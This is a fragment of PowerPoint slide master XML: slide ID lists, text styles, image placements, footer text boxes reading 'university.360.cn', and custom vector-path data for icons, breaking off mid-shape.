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2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId39"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="282" r:id="rId9"/>
    <p:sldId id="274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293" r:id="rId20"/>
    <p:sldId id="311" r:id="rId21"/>
    <p:sldId id="312" r:id="rId22"/>
    <p:sldId id="313" r:id="rId23"/>
    <p:sldId id="314" r:id="rId24"/>
    <p:sldId id="315" r:id="rId25"/>
    <p:sldId id="297" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="299" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="325" r:id="rId32"/>
    <p:sldId id="326" r:id="rId33"/>
    <p:sldId id="279" r:id="rId34"/>
    <p:sldId id="268" r:id="rId35"/>
    <p:sldId id="281" r:id="rId36"/>
    <p:sldId id="269" r:id="rId37"/>
    <p:sldId id="260" r:id="rId38"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId40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8" autoAdjust="0"/>
    <p:restoredTop sz="94511" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="72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 snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54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5" name="Shape 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 panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="228600" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="457200" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="685800" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="914400" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="1143000" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="1371600" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="1600200" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Calibri" panose="020F0502020204030204"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="1828800" latinLnBrk="0">
      <a:defRPr sz="1200">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj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1" descr="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="50028" b="13495"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-812800" y="2149475"/>
            <a:ext cx="4159885" cy="33902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" name="图片 10" descr="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="3900"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961389" y="3518093"/>
            <a:ext cx="10433686" cy="36607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9" descr="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6678" b="1167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766945" y="-391160"/>
            <a:ext cx="7797801" cy="33559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" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6416675"/>
            <a:ext cx="9799320" cy="359411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 anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr spc="2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dirty="0"/>
              <a:t>university.360.cn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550734"/>
            <a:ext cx="1585452" cy="634181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69" y="6369050"/>
            <a:ext cx="11304001" cy="770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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6463579"/>
            <a:ext cx="9799320" cy="359411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 anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr spc="200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sz="1600" dirty="0"/>
              <a:t>university.360.cn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97117"/>
            <a:ext cx="12192000" cy="502848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="89000">
                <a:srgbClr val="00AB7A">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="45000">
                <a:srgbClr val="00AB7A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aseline="-25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1739" y="6320292"/>
            <a:ext cx="1028887" cy="271009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7817226-A4A8-4CA8-8499-073E4B5E2127}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/7/25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069579" y="6502853"/>
            <a:ext cx="789305" cy="278947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ct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CE3A6F2A-4BD1-4B71-A85C-4AC4B8E4C9A9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" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="564" y="236492"/>
            <a:ext cx="251119" cy="309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34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69031" y="219203"/>
            <a:ext cx="145443" cy="145443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 58 w 65"/>
              <a:gd name="T1" fmla="*/ 25 h 65"/>
              <a:gd name="T2" fmla="*/ 40 w 65"/>
              <a:gd name="T3" fmla="*/ 25 h 65"/>
              <a:gd name="T4" fmla="*/ 40 w 65"/>
              <a:gd name="T5" fmla="*/ 7 h 65"/>
              <a:gd name="T6" fmla="*/ 33 w 65"/>
              <a:gd name="T7" fmla="*/ 0 h 65"/>
              <a:gd name="T8" fmla="*/ 25 w 65"/>
              <a:gd name="T9" fmla="*/ 7 h 65"/>
              <a:gd name="T10" fmla="*/ 25 w 65"/>
              <a:gd name="T11" fmla="*/ 11 h 65"/>
              <a:gd name="T12" fmla="*/ 25 w 65"/>
              <a:gd name="T13" fmla="*/ 25 h 65"/>
              <a:gd name="T14" fmla="*/ 7 w 65"/>
              <a:gd name="T15" fmla="*/ 25 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 65"/>
              <a:gd name="T17" fmla="*/ 32 h 65"/>
              <a:gd name="T18" fmla="*/ 7 w 65"/>
              <a:gd name="T19" fmla="*/ 40 h 65"/>
              <a:gd name="T20" fmla="*/ 25 w 65"/>
              <a:gd name="T21" fmla="*/ 40 h 65"/>
              <a:gd name="T22" fmla="*/ 25 w 65"/>
              <a:gd name="T23" fmla="*/ 57 h 65"/>
              <a:gd name="T24" fmla="*/ 33 w 65"/>
              <a:gd name="T25" fmla="*/ 65 h 65"/>
              <a:gd name="T26" fmla="*/ 40 w 65"/>
              <a:gd name="T27" fmla="*/ 57 h 65"/>
              <a:gd name="T28" fmla="*/ 40 w 65"/>
              <a:gd name="T29" fmla="*/ 40 h 65"/>
              <a:gd name="T30" fmla="*/ 45 w 65"/>
              <a:gd name="T31" fmla="*/ 40 h 65"/>
              <a:gd name="T32" fmla="*/ 58 w 65"/>
              <a:gd name="T33" fmla="*/ 40 h 65"/>
              <a:gd name="T34" fmla="*/ 65 w 65"/>
              <a:gd name="T35" fmla="*/ 32 h 65"/>
              <a:gd name="T36" fmla="*/ 58 w 65"/>
              <a:gd name="T37" fmla="*/ 2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5" h="65">
                <a:moveTo>
                  <a:pt x="58" y="25"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25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3"/>
                  <a:pt x="37" y="0"/>
                  <a:pt x="33" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28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25" y="25"/>
                  <a:pt x="25" y="25"/>
                  <a:pt x="25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3" y="25"/>
                  <a:pt x="0" y="28"/>
                  <a:pt x="0" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36"/>
                  <a:pt x="3" y="40"/>
                  <a:pt x="7" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40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61"/>
                  <a:pt x="28" y="65"/>
                  <a:pt x="33" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="65"/>
                  <a:pt x="40" y="61"/>
                  <a:pt x="40" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45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62" y="40"/>
                  <a:pt x="65" y="36"/>
                  <a:pt x="65" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="28"/>
                  <a:pt x="62" y="25"/>
                  <a:pt x="58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34"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="226448" y="341831"/>
            <a:ext cx="77055" cy="77055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 58 w 65"/>
              <a:gd name="T1" fmla="*/ 25 h 65"/>
              <a:gd name="T2" fmla="*/ 40 w 65"/>
              <a:gd name="T3" fmla="*/ 25 h 65"/>
              <a:gd name="T4" fmla="*/ 40 w 65"/>
              <a:gd name="T5" fmla="*/ 7 h 65"/>
              <a:gd name="T6" fmla="*/ 33 w 65"/>
              <a:gd name="T7" fmla="*/ 0 h 65"/>
              <a:gd name="T8" fmla="*/ 25 w 65"/>
              <a:gd name="T9" fmla="*/ 7 h 65"/>
              <a:gd name="T10" fmla="*/ 25 w 65"/>
              <a:gd name="T11" fmla="*/ 11 h 65"/>
              <a:gd name="T12" fmla="*/ 25 w 65"/>
              <a:gd name="T13" fmla="*/ 25 h 65"/>
              <a:gd name="T14" fmla="*/ 7 w 65"/>
              <a:gd name="T15" fmla="*/ 25 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 65"/>
              <a:gd name="T17" fmla="*/ 32 h 65"/>
              <a:gd name="T18" fmla="*/ 7 w 65"/>
              <a:gd name="T19" fmla="*/ 40 h 65"/>
              <a:gd name="T20" fmla="*/ 25 w 65"/>
              <a:gd name="T21" fmla="*/ 40 h 65"/>
              <a:gd name="T22" fmla="*/ 25 w 65"/>
              <a:gd name="T23" fmla="*/ 57 h 65"/>
              <a:gd name="T24" fmla="*/ 33 w 65"/>
              <a:gd name="T25" fmla="*/ 65 h 65"/>
              <a:gd name="T26" fmla="*/ 40 w 65"/>
              <a:gd name="T27" fmla="*/ 57 h 65"/>
              <a:gd name="T28" fmla="*/ 40 w 65"/>
              <a:gd name="T29" fmla="*/ 40 h 65"/>
              <a:gd name="T30" fmla="*/ 45 w 65"/>
              <a:gd name="T31" fmla="*/ 40 h 65"/>
              <a:gd name="T32" fmla="*/ 58 w 65"/>
              <a:gd name="T33" fmla="*/ 40 h 65"/>
              <a:gd name="T34" fmla="*/ 65 w 65"/>
              <a:gd name="T35" fmla="*/ 32 h 65"/>
              <a:gd name="T36" fmla="*/ 58 w 65"/>
              <a:gd name="T37" fmla="*/ 2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5" h="65">
                <a:moveTo>
                  <a:pt x="58" y="25"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25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3"/>
                  <a:pt x="37" y="0"/>
                  <a:pt x="33" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28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25" y="25"/>
                  <a:pt x="25" y="25"/>
                  <a:pt x="25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3" y="25"/>
                  <a:pt x="0" y="28"/>
                  <a:pt x="0" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36"/>
                  <a:pt x="3" y="40"/>
                  <a:pt x="7" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40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61"/>
                  <a:pt x="28" y="65"/>
                  <a:pt x="33" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="65"/>
                  <a:pt x="40" y="61"/>
                  <a:pt x="40" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45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62" y="40"/>
                  <a:pt x="65" y="36"/>
                  <a:pt x="65" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="28"/>
                  <a:pt x="62" y="25"/>
                  <a:pt x="58" y="25"/>
                </a:cubicBez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2" name="组合 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10482901" y="170733"/>
            <a:ext cx="1375983" cy="344775"/>
            <a:chOff x="7550392" y="-466606"/>
            <a:chExt cx="1031987" cy="258581"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="555963"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7591672" y="-422211"/>
              <a:ext cx="66982" cy="65424"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 40"/>
                <a:gd name="T1" fmla="*/ 15 h 39"/>
                <a:gd name="T2" fmla="*/ 25 w 40"/>
                <a:gd name="T3" fmla="*/ 15 h 39"/>
                <a:gd name="T4" fmla="*/ 25 w 40"/>
                <a:gd name="T5" fmla="*/ 4 h 39"/>
                <a:gd name="T6" fmla="*/ 20 w 40"/>
                <a:gd name="T7" fmla="*/ 0 h 39"/>
                <a:gd name="T8" fmla="*/ 16 w 40"/>
                <a:gd name="T9" fmla="*/ 4 h 39"/>
                <a:gd name="T10" fmla="*/ 16 w 40"/>
                <a:gd name="T11" fmla="*/ 15 h 39"/>
                <a:gd name="T12" fmla="*/ 5 w 40"/>
                <a:gd name="T13" fmla="*/ 15 h 39"/>
                <a:gd name="T14" fmla="*/ 0 w 40"/>
                <a:gd name="T15" fmla="*/ 20 h 39"/>
                <a:gd name="T16" fmla="*/ 0 w 40"/>
                <a:gd name="T17" fmla="*/ 20 h 39"/>
                <a:gd name="T18" fmla="*/ 5 w 40"/>
                <a:gd name="T19" fmla="*/ 24 h 39"/>
                <a:gd name="T20" fmla="*/ 16 w 40"/>
                <a:gd name="T21" fmla="*/ 24 h 39"/>
                <a:gd name="T22" fmla="*/ 16 w 40"/>
                <a:gd name="T23" fmla="*/ 35 h 39"/>
                <a:gd name="T24" fmla="*/ 20 w 40"/>
                <a:gd name="T25" fmla="*/ 39 h 39"/>
                <a:gd name="T26" fmla="*/ 25 w 40"/>
                <a:gd name="T27" fmla="*/ 35 h 39"/>
                <a:gd name="T28" fmla="*/ 25 w 40"/>
                <a:gd name="T29" fmla="*/ 24 h 39"/>
                <a:gd name="T30" fmla="*/ 35 w 40"/>
                <a:gd name="T31" fmla="*/ 24 h 39"/>
                <a:gd name="T32" fmla="*/ 40 w 40"/>
                <a:gd name="T33" fmla="*/ 20 h 39"/>
                <a:gd name="T34" fmla="*/ 40 w 40"/>
                <a:gd name="T35" fmla="*/ 20 h 39"/>
                <a:gd name="T36" fmla="*/ 35 w 40"/>
                <a:gd name="T37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39">
                  <a:moveTo>
                    <a:pt x="35" y="15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2"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="16" y="2"/>
                    <a:pt x="16" y="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15"/>
                    <a:pt x="0" y="17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2" y="24"/>
                    <a:pt x="5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7"/>
                    <a:pt x="18" y="39"/>
                    <a:pt x="20" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="39"/>
                    <a:pt x="25" y="37"/>
                    <a:pt x="25" y="3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7"/>
                    <a:pt x="38" y="15"/>
                    <a:pt x="3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7550392" y="-466606"/>
              <a:ext cx="151098" cy="154214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 84 w 91"/>
                <a:gd name="T1" fmla="*/ 22 h 91"/>
                <a:gd name="T2" fmla="*/ 83 w 91"/>
                <a:gd name="T3" fmla="*/ 20 h 91"/>
                <a:gd name="T4" fmla="*/ 60 w 91"/>
                <a:gd name="T5" fmla="*/ 3 h 91"/>
                <a:gd name="T6" fmla="*/ 59 w 91"/>
                <a:gd name="T7" fmla="*/ 2 h 91"/>
                <a:gd name="T8" fmla="*/ 58 w 91"/>
                <a:gd name="T9" fmla="*/ 2 h 91"/>
                <a:gd name="T10" fmla="*/ 56 w 91"/>
                <a:gd name="T11" fmla="*/ 1 h 91"/>
                <a:gd name="T12" fmla="*/ 55 w 91"/>
                <a:gd name="T13" fmla="*/ 1 h 91"/>
                <a:gd name="T14" fmla="*/ 51 w 91"/>
                <a:gd name="T15" fmla="*/ 1 h 91"/>
                <a:gd name="T16" fmla="*/ 50 w 91"/>
                <a:gd name="T17" fmla="*/ 0 h 91"/>
                <a:gd name="T18" fmla="*/ 48 w 91"/>
                <a:gd name="T19" fmla="*/ 0 h 91"/>
                <a:gd name="T20" fmla="*/ 47 w 91"/>
                <a:gd name="T21" fmla="*/ 0 h 91"/>
                <a:gd name="T22" fmla="*/ 45 w 91"/>
                <a:gd name="T23" fmla="*/ 0 h 91"/>
                <a:gd name="T24" fmla="*/ 8 w 91"/>
                <a:gd name="T25" fmla="*/ 20 h 91"/>
                <a:gd name="T26" fmla="*/ 7 w 91"/>
                <a:gd name="T27" fmla="*/ 21 h 91"/>
                <a:gd name="T28" fmla="*/ 6 w 91"/>
                <a:gd name="T29" fmla="*/ 23 h 91"/>
                <a:gd name="T30" fmla="*/ 5 w 91"/>
                <a:gd name="T31" fmla="*/ 24 h 91"/>
                <a:gd name="T32" fmla="*/ 5 w 91"/>
                <a:gd name="T33" fmla="*/ 25 h 91"/>
                <a:gd name="T34" fmla="*/ 4 w 91"/>
                <a:gd name="T35" fmla="*/ 26 h 91"/>
                <a:gd name="T36" fmla="*/ 0 w 91"/>
                <a:gd name="T37" fmla="*/ 46 h 91"/>
                <a:gd name="T38" fmla="*/ 5 w 91"/>
                <a:gd name="T39" fmla="*/ 66 h 91"/>
                <a:gd name="T40" fmla="*/ 31 w 91"/>
                <a:gd name="T41" fmla="*/ 88 h 91"/>
                <a:gd name="T42" fmla="*/ 32 w 91"/>
                <a:gd name="T43" fmla="*/ 89 h 91"/>
                <a:gd name="T44" fmla="*/ 34 w 91"/>
                <a:gd name="T45" fmla="*/ 89 h 91"/>
                <a:gd name="T46" fmla="*/ 36 w 91"/>
                <a:gd name="T47" fmla="*/ 90 h 91"/>
                <a:gd name="T48" fmla="*/ 45 w 91"/>
                <a:gd name="T49" fmla="*/ 91 h 91"/>
                <a:gd name="T50" fmla="*/ 48 w 91"/>
                <a:gd name="T51" fmla="*/ 91 h 91"/>
                <a:gd name="T52" fmla="*/ 53 w 91"/>
                <a:gd name="T53" fmla="*/ 90 h 91"/>
                <a:gd name="T54" fmla="*/ 54 w 91"/>
                <a:gd name="T55" fmla="*/ 90 h 91"/>
                <a:gd name="T56" fmla="*/ 58 w 91"/>
                <a:gd name="T57" fmla="*/ 89 h 91"/>
                <a:gd name="T58" fmla="*/ 59 w 91"/>
                <a:gd name="T59" fmla="*/ 89 h 91"/>
                <a:gd name="T60" fmla="*/ 61 w 91"/>
                <a:gd name="T61" fmla="*/ 88 h 91"/>
                <a:gd name="T62" fmla="*/ 62 w 91"/>
                <a:gd name="T63" fmla="*/ 88 h 91"/>
                <a:gd name="T64" fmla="*/ 64 w 91"/>
                <a:gd name="T65" fmla="*/ 87 h 91"/>
                <a:gd name="T66" fmla="*/ 65 w 91"/>
                <a:gd name="T67" fmla="*/ 86 h 91"/>
                <a:gd name="T68" fmla="*/ 67 w 91"/>
                <a:gd name="T69" fmla="*/ 85 h 91"/>
                <a:gd name="T70" fmla="*/ 68 w 91"/>
                <a:gd name="T71" fmla="*/ 85 h 91"/>
                <a:gd name="T72" fmla="*/ 91 w 91"/>
                <a:gd name="T73" fmla="*/ 46 h 91"/>
                <a:gd name="T74" fmla="*/ 72 w 91"/>
                <a:gd name="T75" fmla="*/ 77 h 91"/>
                <a:gd name="T76" fmla="*/ 24 w 91"/>
                <a:gd name="T77" fmla="*/ 64 h 91"/>
                <a:gd name="T78" fmla="*/ 8 w 91"/>
                <a:gd name="T79" fmla="*/ 62 h 91"/>
                <a:gd name="T80" fmla="*/ 8 w 91"/>
                <a:gd name="T81" fmla="*/ 62 h 91"/>
                <a:gd name="T82" fmla="*/ 18 w 91"/>
                <a:gd name="T83" fmla="*/ 14 h 91"/>
                <a:gd name="T84" fmla="*/ 67 w 91"/>
                <a:gd name="T85" fmla="*/ 27 h 91"/>
                <a:gd name="T86" fmla="*/ 83 w 91"/>
                <a:gd name="T87" fmla="*/ 29 h 91"/>
                <a:gd name="T88" fmla="*/ 83 w 91"/>
                <a:gd name="T89" fmla="*/ 29 h 91"/>
                <a:gd name="T90" fmla="*/ 72 w 91"/>
                <a:gd name="T91" fmla="*/ 7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1" h="91">
                  <a:moveTo>
                    <a:pt x="84" y="22"/>
                  </a:move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1"/>
                    <a:pt x="83" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="21"/>
                    <a:pt x="83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7" y="12"/>
                    <a:pt x="69" y="6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2"/>
                    <a:pt x="57" y="2"/>
                    <a:pt x="56" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="2"/>
                    <a:pt x="56" y="2"/>
                    <a:pt x="56" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56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4" y="1"/>
                    <a:pt x="53" y="1"/>
                    <a:pt x="52" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="1"/>
                    <a:pt x="51" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="51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4" y="0"/>
                    <a:pt x="44" y="0"/>
                    <a:pt x="43" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="1"/>
                    <a:pt x="15" y="9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0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6" y="22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5"/>
                    <a:pt x="5" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="5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1" y="32"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53"/>
                    <a:pt x="2" y="60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10" y="77"/>
                    <a:pt x="19" y="85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2" y="89"/>
                    <a:pt x="32" y="89"/>
                    <a:pt x="33" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="89"/>
                    <a:pt x="34" y="89"/>
                    <a:pt x="34" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="89"/>
                    <a:pt x="34" y="90"/>
                    <a:pt x="34" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="90"/>
                    <a:pt x="35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9" y="91"/>
                    <a:pt x="42" y="91"/>
                    <a:pt x="45" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="91"/>
                    <a:pt x="46" y="91"/>
                    <a:pt x="47" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="91"/>
                    <a:pt x="47" y="91"/>
                    <a:pt x="48" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="91"/>
                    <a:pt x="51" y="90"/>
                    <a:pt x="53" y="90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5" y="90"/>
                    <a:pt x="56" y="89"/>
                    <a:pt x="57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8" y="89"/>
                    <a:pt x="58" y="89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89"/>
                    <a:pt x="60" y="88"/>
                    <a:pt x="60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88"/>
                    <a:pt x="61" y="88"/>
                    <a:pt x="62" y="88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62" y="87"/>
                    <a:pt x="63" y="87"/>
                    <a:pt x="63" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="87"/>
                    <a:pt x="64" y="87"/>
                    <a:pt x="64" y="87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5" y="87"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="66" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="86"/>
                    <a:pt x="66" y="86"/>
                    <a:pt x="67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5"/>
                    <a:pt x="68" y="85"/>
                    <a:pt x="68" y="85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82" y="77"/>
                    <a:pt x="91" y="62"/>
                    <a:pt x="91" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="37"/>
                    <a:pt x="88" y="29"/>
                    <a:pt x="84" y="22"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="72" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="78"/>
                    <a:pt x="65" y="80"/>
                    <a:pt x="61" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="82"/>
                    <a:pt x="35" y="76"/>
                    <a:pt x="24" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="63"/>
                    <a:pt x="19" y="61"/>
                    <a:pt x="18" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
